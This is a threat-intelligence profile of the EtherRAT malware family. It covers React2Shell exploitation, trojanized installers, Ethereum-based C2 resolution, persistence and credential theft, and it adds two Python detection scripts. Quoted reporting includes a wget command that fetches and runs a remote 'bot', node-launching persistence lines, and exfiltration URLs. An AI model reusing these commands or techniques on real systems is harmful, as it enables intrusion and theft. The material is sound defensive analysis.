EtherRAT
EtherRAT is a JavaScript/Node.js remote access trojan and persistent access implant that was first publicly reported in December 2025 in React2Shell (CVE-2025-55182) exploitation against vulnerable Linux/Next.js servers, and later evolved into a Windows-focused threat delivered through trojanized MSI installers and spoofed GitHub repositories impersonating legitimate IT tools such as Tftpd64, PsExec, AzCopy, Sysmon, LAPS, Kusto Explorer, and RAMMap. On Linux, observed delivery involved a shell script fetched from 193.24.123[.]68:3001/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh that downloaded a legitimate Node.js runtime, decrypted AES-256-CBC-protected JavaScript components, and launched the implant. On Windows, malicious installers created staging directories under local app data, deployed or downloaded Node.js, and established persistence via HKCU\Software\Microsoft\Windows\CurrentVersion\Run, often launching conhost.exe in headless mode to invoke node.exe with obfuscated payloads.
A defining feature of EtherRAT is blockchain-based command-and-control discovery: multiple reports state that it retrieves live C2 information from Ethereum, including smart contract 0x22f96d61cf118efabc7c5bf3384734fad2f6ead4 in Linux-focused activity, and that Windows variants query public Ethereum RPC infrastructure, including 1rpc.io and other public RPC services, to resolve or refresh C2 URLs. Reported resolved infrastructure included hxxp://91.215.85[.]42:3000, with historical references to 173.249.8.102 and an older fallback C2 of hxxp://135[.]125[.]255[.]55. The malware polls C2 frequently using randomized paths designed to resemble static asset requests and uses the X-Bot-Server header in at least the Linux variant. Some reporting also describes self-update or re-obfuscation behavior in which the malware can overwrite its own source with server-provided JavaScript.
Observed Linux persistence mechanisms include systemd user services, XDG autostart entries, cron jobs, and .bashrc and .profile modification. Windows variants persist through Run key entries and silent background execution through conhost.exe and node.exe. Reconnaissance capabilities directly described in the reporting include collection of host identity and environment data, system locale, GPU details, antivirus products, Active Directory domain membership, logged-in session status, MachineGuid values, and broader host/network profiling.
EtherRAT has been observed delivering or executing follow-on JavaScript modules for credential and cryptocurrency theft, host reconnaissance, React2Shell scanning and exploitation, web-server hijacking, and SSH persistence. Reported theft targets include cryptocurrency wallets, BIP39 seed phrases, Ethereum private keys, SSH keys, cloud credentials, tokens, database secrets, browser-stored data, shell histories, API keys, and Kubernetes- or cloud-related secrets. Exfiltration associated with the Linux campaign included hxxp://91.215.85[.]42:3000/crypto/keys. Additional observed behavior includes scanning public and private IPv4 ranges on ports 80, 443, 3000, 3001, 8080, and 8443 for vulnerable React/Next.js servers; exploiting React2Shell to propagate; modifying nginx and Apache configurations to redirect traffic to hxxps://xss[.]pro; and appending an attacker SSH public key to authorized_keys.
Targeting described in the collected reporting includes Linux servers exposed to React2Shell exploitation, as well as enterprise administrators, DevOps engineers, security analysts, IT administrators, and network professionals lured into downloading spoofed administrative tools. Industries explicitly mentioned in related exploitation reporting include insurance, e-commerce, IT, and cryptocurrency organizations. Several sources note suspected DPRK/North Korea links, including Sysdig’s reporting of possible North Korean-linked deployment and later reporting that the campaign was suspected to be linked to a DPRK APT, but no source presents the attribution as definitive. Other reporting discusses code or infrastructure overlaps with Lazarus-linked tooling and, separately, eSentire notes similarities to the Tsundere malware investigated in MuddyWater-attributed infrastructure.
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... React2Shell is a vulnerability in the Flight protocol, which facilitates client-server communication for React Server Components. The vulnerability stems from insecure deserialization... Under certain conditions, this can enable an attacker to execute arbitrary code on the server.
Additionally, React2Shell attacks were recorded to distribute new EtherRAT malware, which was previously analyzed by Sysdig Threat Research Team.
Groups observed using it
3 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Ultimately, Atos Researchers identified it to be an EtherRat malware, a recently emerging threat using Ethereum to store C2 URL addresses, preventing takedown of the infrastructure.
this payload, dubbed EtherRAT, represents something far more sophisticated. It is a persistent access implant that combines techniques from at least three documented campaigns into a single, previously unreported attack chain.
“this payload, dubbed EtherRAT… is a persistent access implant… EtherRAT leverages Ethereum smart contracts for command-and-control (C2) resolution…”
Techniques & procedures
33 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
2 techniques
While exploiting the React2Shell vulnerability, threat actors downloaded Tactical RMM... Script 3 ... After identifying a host vulnerable to React2Shell, it exploits the vulnerability to download and execute a payload script
The compromised distribution investigated by our team originated from a malicious GitHub repository impersonating the official project and offering downloads for “Tftpd64 v4.74.” Users who retrieved the ZIP or MSI file unknowingly received a bundle containing the EtherRAT implant embedded alongside legitimate‑looking components.
Execution
5 techniques
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
This included PowerShell‑driven queries for system locale, GPU details, antivirus products registered under the Windows Security Center, Active Directory domain membership, logged‑in user session status, and MachineGuid values.
After compromising a host via the React2Shell vulnerability, threat actors executed the following commands inside a container: /bin/sh -c 'cd /tmp; wget hxxp://176.117.107[.]154/bot; chmod 777 bot; ./bot...'
This script serves as the EtherRAT malware capable of executing arbitrary JS code received from the C2 server... Subsequently, the malware sends a query to this C2 server to retrieve JS code fragments.
The threat actors leveraged the CVE‑2025‑55182 (React2Shell) vulnerability... Under certain conditions, this can enable an attacker to execute arbitrary code on the server.
Persistence
7 techniques
The malware establishes persistence through... .bashrc : (nohup /usr/bin/node <jsPath> >/dev/null 2>&1 &) ... .profile : (/usr/bin/node <jsPath> >/dev/null 2>&1 &)
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
The script also establishes persistence by creating a systemd service /etc/systemd/system/apaches-main.service... If executed with root privileges... creates a systemd service... CrossC2 check.sh creates and starts a service... EtherRAT establishes persistence through: systemd.
If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... .bashrc ... .profile
The malware establishes persistence through... XDG Autostart: [Desktop Entry] Type=Application Name=System Service Exec=/usr/bin/node /<jsPath>
Organizations have been urged to... observe suspicious entries in Windows Run registry keys to combat the threat.
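The persistence artifacts quoted above are concrete enough to hunt for directly. The following is an added example (not code from the Mallory page or from any of the quoted vendors): each check takes file content as a string so it runs offline against the constructed samples embedded below, and in practice would be fed the real ~/.bashrc, ~/.profile, `crontab -l` output, systemd unit files, ~/.config/autostart/*.desktop entries and HKCU Run values. The sample paths and the `conhost.exe --headless` form of the Run value are assumptions; the reporting only says "headless mode".

```python
"""Hunt for the Linux and Windows persistence artifacts the reporting describes.

Added example (not the Mallory page's code nor any vendor's tool). Each
function takes file content as a string so it can run offline against the
constructed samples below.
"""
import re

# The common thread across every Linux method in the reporting: a login or
# autostart hook that launches the Node.js binary.
NODE_LAUNCH = re.compile(r"(?:/usr/bin/node|\bnode(?:\.exe)?)\b")

# --- constructed samples (not real artifacts; paths are placeholders) ---
SAMPLE_BASHRC = """# constructed ~/.bashrc
export PATH=$PATH:$HOME/bin
alias ll='ls -l'
(nohup /usr/bin/node /home/dev/.cache/abc.js >/dev/null 2>&1 &)
"""
SAMPLE_PROFILE = "# constructed clean ~/.profile\numask 022\n"
SAMPLE_CRONTAB = """# constructed `crontab -l` output
0 3 * * * /usr/bin/backup.sh
@reboot /usr/bin/node /home/dev/.cache/abc.js >/dev/null 2>&1
"""
SAMPLE_UNIT = """[Unit]
Description=Apache Main

[Service]
ExecStart=/usr/bin/node /opt/.x/abc.js
Restart=always

[Install]
WantedBy=multi-user.target
"""
SAMPLE_DESKTOP = """[Desktop Entry]
Type=Application
Name=System Service
Exec=/usr/bin/node /home/dev/.cache/abc.js
"""
# conhost --headless is assumed to be what "headless mode" means in the reporting
SAMPLE_RUN_VALUE = (r'"C:\Windows\System32\conhost.exe" --headless '
                    r'"C:\Users\dev\AppData\Local\SysUpd\node.exe" '
                    r'"C:\Users\dev\AppData\Local\SysUpd\a.js"')


def scan_shell_rc(text):
    """Lines in ~/.bashrc or ~/.profile that launch node; rc files normally never do."""
    return [line.strip() for line in text.splitlines() if NODE_LAUNCH.search(line)]


def scan_crontab(text):
    """@reboot entries (the trigger the reporting names) that run node."""
    return [line.strip() for line in text.splitlines()
            if line.lstrip().startswith("@reboot") and NODE_LAUNCH.search(line)]


def scan_systemd_unit(text):
    """The ExecStart command if the unit runs node, else None. A unit named like a
    web server (apaches-main.service in the reporting) hiding a node launch is the tell."""
    for line in text.splitlines():
        if line.startswith("ExecStart=") and NODE_LAUNCH.search(line):
            return line.split("=", 1)[1].strip()
    return None


def scan_xdg_autostart(text):
    """The Exec command if a .desktop autostart entry launches node, else None."""
    if "[Desktop Entry]" not in text:
        return None
    for line in text.splitlines():
        if line.startswith("Exec=") and NODE_LAUNCH.search(line):
            return line[len("Exec="):].strip()
    return None


def scan_run_value(value):
    """True for a Run value that starts node.exe via conhost or from LocalAppData."""
    v = value.lower()
    return "node.exe" in v and ("conhost" in v or "\\appdata\\local\\" in v)


CHECKS = {
    "bashrc": scan_shell_rc, "profile": scan_shell_rc, "crontab": scan_crontab,
    "systemd": scan_systemd_unit, "xdg_autostart": scan_xdg_autostart,
    "run_key": scan_run_value,
}


def hunt(artifacts):
    """Run every check over a {label: content} mapping; return only the hits."""
    hits = {}
    for label, content in artifacts.items():
        result = CHECKS[label](content)
        if result:
            hits[label] = result
    return hits


if __name__ == "__main__":
    samples = {"bashrc": SAMPLE_BASHRC, "profile": SAMPLE_PROFILE,
               "crontab": SAMPLE_CRONTAB, "systemd": SAMPLE_UNIT,
               "xdg_autostart": SAMPLE_DESKTOP, "run_key": SAMPLE_RUN_VALUE}
    for label, finding in hunt(samples).items():
        print(f"[!] {label}: {finding}")
```

The checks deliberately key on the launch of the Node.js binary from a login or autostart hook rather than on the specific file names in the reporting, since those are randomized per sample; the clean ~/.profile sample shows that ordinary rc content does not trigger them.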
Privilege Escalation
6 techniques
The malware establishes persistence through... .bashrc : (nohup /usr/bin/node <jsPath> >/dev/null 2>&1 &) ... .profile : (/usr/bin/node <jsPath> >/dev/null 2>&1 &)
The script also establishes persistence by creating... a Cron task... If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... crontab.
The script also establishes persistence by creating a systemd service /etc/systemd/system/apaches-main.service... If executed with root privileges... creates a systemd service... CrossC2 check.sh creates and starts a service... EtherRAT establishes persistence through: systemd.
If executed without root privileges... adds it to both crontab (via @reboot) and .bashrc... EtherRAT establishes persistence through... .bashrc ... .profile
The malware establishes persistence through... XDG Autostart: [Desktop Entry] Type=Application Name=System Service Exec=/usr/bin/node /<jsPath>
Stealth
4 techniques
The archive included several anomalous auxiliary files... attackers hide the core JavaScript payload inside encrypted or obfuscated .dat files... During execution, EtherRAT contacted domains such as wpuadmin[.]shop... and handled encrypted configuration elements stored using AES‑256‑CBC with bundled keys and IVs.
Threat actors have leveraged a malicious copy of the popular Windows TFTP server and admin tool, Tftpd64... Executing the illicit Tftpd64 installer file downloaded from a spoofed GitHub repository...
The loader decrypts this payload using a XOR operation with the key 0x99 ... kxnzl4mtez.js decrypted the 1d5j6rm2mg2d file using AES-256-CBC ... configuration data is decrypted using the AES-128-CBC algorithm
...enables EtherRAT to establish a concealed directory within the local app data folder while deploying a self-contained Node.js runtime and other staged components to evade security tools...
Defense Impairment
1 technique
Credential Access
3 techniques
This is a script that functions as a JS-based stealer designed to collect and exfiltrate a wide array of sensitive user data, including cryptocurrency wallets, access tokens, cloud service configurations, and database credentials.
This script automatically modifies the configuration of nginx and Apache web servers in order to force all HTTP and HTTPS traffic to redirect to an external domain.
The script harvests private SSH keys, performs a complete scan of the ~/.ssh directory...
Discovery
9 techniques
The script gathers a set of basic system information, including the username and hostname... Reconnaissance ... id
Script 3... generates random public IPv4 addresses and tries them against ports 80, 443, 3000, 3001, 8080, 8443. After identifying a host vulnerable to React2Shell, it exploits the vulnerability...
The alive.sh script executes ps -eo pid,pcpu --no-headers... The script also records... a list of running web server processes.
After compromising a host via the React2Shell vulnerability, the attackers performed reconnaissance... Decoded commands: ls ... nslookup `whoami`... nslookup `id`... The ch.sh script executed a series of reconnaissance commands to gather... date hostname uname -a id...
Decoded commands: ls ... nslookup `ls`... The JS-based stealer recursively traverses directories with a depth limit... scans home and system directories...
...obtaining Active Directory domain membership...
it also extracts tokens and API keys from various services, including ... cloud providers (AWS, GCP, Azure) ... extracts AWS configuration files, gcloud-credentials
extracts AWS configuration files, gcloud-credentials, and Kubernetes and Docker configuration files
...obtaining Active Directory domain membership, system locale, and other details...
Collection
1 technique
This is a script that functions as a JS-based stealer designed to collect and exfiltrate a wide array of sensitive user data... scans home and system directories... reads files up to 10 MB in size
Command and Control
2 techniques
The a_x86 / a_x64 files use the same C2 server: 154.89.152[.]240:443 ... MeshServer=wss://156.67.221[.]96:443/agent.ashx ... The malware sends a query to this C2 server ... GET /api/{rand4hex}/{botID}/...
This script downloaded the XMRig cryptocurrency miner... The attackers also loaded the d5.sh Bash script onto the compromised host to download the Sliver implant... The attackers employed the check.sh Bash script to download ELF executables (a_x86 / a_x64) from a server.
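The C2 polling pattern quoted above (GET /api/{rand4hex}/{botID}/...), together with the X-Bot-Server header and the frequent, static-asset-looking polling described in the overview, is enough to build a log-side detection. The following is an added example, not code from the Mallory page or any vendor report. It assumes {rand4hex} means four hexadecimal characters, uses a simplified constructed proxy log format (timestamp, source, destination, method, path, then any notable header names), and reuses the 91.215.85[.]42:3000 address the reporting cites as the C2 host for the infected-host sample lines.

```python
"""Detect EtherRAT-style C2 polling in web proxy logs.

Added example, not from the Mallory page or any vendor report. Two observables
from the reporting are encoded: request paths shaped like
/api/{rand4hex}/{botID}/... (rand4hex assumed to be four hex characters) and
the X-Bot-Server header. Frequent polling per (source, destination) pair is
then used to raise the actual alert.
"""
import re
from collections import defaultdict
from datetime import datetime, timezone
from statistics import median

# /api/<4 hex chars>/<bot id>/<anything, typically a static-asset-looking name>
C2_PATH = re.compile(r"^/api/[0-9a-f]{4}/[A-Za-z0-9_-]+/")

# constructed sample log: one host polling every 15 s, one ordinary client.
# Format (constructed): timestamp src dst method path [header names...]
SAMPLE_LOG = """\
2025-12-10T10:00:00Z 10.0.0.5 91.215.85.42:3000 GET /api/3f9a/b7c1d2e3/app.css X-Bot-Server
2025-12-10T10:00:15Z 10.0.0.5 91.215.85.42:3000 GET /api/a1c2/b7c1d2e3/vendor.js X-Bot-Server
2025-12-10T10:00:30Z 10.0.0.5 91.215.85.42:3000 GET /api/0e4f/b7c1d2e3/logo.png X-Bot-Server
2025-12-10T10:00:45Z 10.0.0.5 91.215.85.42:3000 GET /api/77d3/b7c1d2e3/main.css X-Bot-Server
2025-12-10T10:01:00Z 10.0.0.5 91.215.85.42:3000 GET /api/c9b0/b7c1d2e3/index.js X-Bot-Server
2025-12-10T10:00:05Z 10.0.0.7 203.0.113.10:443 GET /static/app.css
2025-12-10T10:07:00Z 10.0.0.7 203.0.113.10:443 GET /api/users/42/profile
"""


def parse_line(line):
    """Parse one constructed-format line into a record, or None if malformed."""
    parts = line.split()
    if len(parts) < 5:
        return None
    ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)
    return {"ts": ts, "src": parts[1], "dst": parts[2], "method": parts[3],
            "path": parts[4], "headers": set(parts[5:])}


def parse_log(text):
    return [r for r in (parse_line(l) for l in text.splitlines()) if r]


def is_c2_request(rec):
    """The path shape alone is a strong signal; the header confirms it."""
    return bool(C2_PATH.match(rec["path"])) or "X-Bot-Server" in rec["headers"]


def find_beacons(records, min_hits=3, max_median_interval=60.0):
    """Group C2-shaped requests by (src, dst) and flag pairs that poll frequently.

    Randomized paths defeat exact-URL matching, so the alert keys on the
    request shape plus the polling cadence rather than on any single URL.
    """
    groups = defaultdict(list)
    for r in records:
        if is_c2_request(r):
            groups[(r["src"], r["dst"])].append(r["ts"])
    alerts = []
    for (src, dst), times in groups.items():
        times.sort()
        if len(times) < min_hits:
            continue
        gaps = [(b - a).total_seconds() for a, b in zip(times, times[1:])]
        med = median(gaps)
        if med <= max_median_interval:
            alerts.append({"src": src, "dst": dst, "requests": len(times),
                           "median_interval_s": med})
    return alerts


if __name__ == "__main__":
    for alert in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"[!] {alert['src']} -> {alert['dst']}: {alert['requests']} C2-shaped "
              f"requests, median interval {alert['median_interval_s']:.0f}s")
```

The ordinary client's /api/users/42/profile request shows why the four-hex-character segment matters: a generic /api/ prefix match would produce false positives on any REST backend, while the cadence check keeps a single stray match from alerting on its own.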
Exfiltration
1 technique
The script recursively traverses directories... and finally exfiltrates the harvested data to the remote server hxxp://91.215.85[.]42:3000/crypto/keys... The collected data was then exfiltrated to hxxp://109.238.92[.]111:8000/upload.
Impact
1 technique
...a new hybrid attack campaign that combines system compromise with cryptocurrency theft... before downloading another Node.js runtime and targeting several Ethereum RPC endpoints and Ethereum wallet addresses.
IOCs tracked for this family
113 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
62 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
A malware family with Linux and Windows variants that establishes persistence, downloads a portable Node.js runtime, launches obfuscated JavaScript payloads, and uses Ethereum blockchain infrastructure via EtherHiding/1rpc.io to dynamically resolve and update its C2 configuration.
A remote access trojan delivered via a trojanized Tftpd64 installer from a spoofed GitHub repository. It establishes persistence, creates a concealed directory under local app data, deploys self-contained Node.js runtimes and staged components to evade security tools, performs system reconnaissance including Active Directory domain membership and system locale collection, and targets Ethereum RPC endpoints and wallet addresses for cryptocurrency theft.
A multi-stage, fileless-style JavaScript RAT distributed via malicious MSI installers masquerading as legitimate administrative tools. It uses staged execution, in-memory decryption/execution of payloads, persistence via a registry Run key, and stores live C2 server address information via the Ethereum blockchain.
A multi-stage, fileless-style Node.js remote access trojan delivered via malicious MSI installers impersonating administrative tools. It uses layered AES-256-CBC encryption, downloads Node.js at runtime, establishes persistence via the Run registry key, resolves C2 through Ethereum smart contracts/public RPC endpoints, polls for commands, executes arbitrary JavaScript/OS commands, exfiltrates data, and periodically re-obfuscates itself.